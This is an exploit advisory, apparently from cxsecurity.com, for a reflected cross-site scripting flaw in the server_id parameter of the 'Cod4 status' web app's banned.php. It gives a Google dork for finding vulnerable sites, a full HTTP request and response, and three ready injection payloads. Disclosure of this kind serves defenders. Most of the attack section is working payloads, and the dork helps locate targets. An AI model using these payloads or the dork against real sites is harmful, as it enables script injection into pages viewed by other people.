Cod4 status - Cross-site scripting (XSS)

2018.09.11
ir kodak (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Cod4 status - Cross-site scripting (XSS) # Exploit Author: kodak # Date: 2018-09-11 # Google Dork: inurl:"banned.php?server_id=" # Software Link: https://github.com/SirReaDy/cod4-status-server # Category : webapps # Tested on: Kali Linux / Windows 7 # CVE: N/A 1. Description: -------------------- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. What is "Cod4 status screenshot view web" ?! It gives you a list of players currently on the server, server administrator list, banned player list and the screenshots taken with $getss command. 2. Exploit/POC: -------------------- # Request: http://127.0.0.1/banned.php?server_id="><script>alert("K0DAK:]")</script> GET /banned.php?server_id=%22%3E%3Cscript%3Ealert(%22K0DAK:]%22)%3C/script%3E HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=l89iuld37adri6s9krvum4n7q0 Connection: keep-alive Upgrade-Insecure-Requests: 1 # Response: HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 2554 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=5, max=100 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Encoding: gzip Parameter: Server_id Reflected (GET) Location : banned.php Payloads : server_id="><script>alert("K0DAK:]")</script> Or server_id="><iframe/src=javascript:confirm(2)>X Or server_id="/><svg/onload=prompt(1)> 3. Screenshot -------------------- https://imgur.com/a/g95fG0l


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top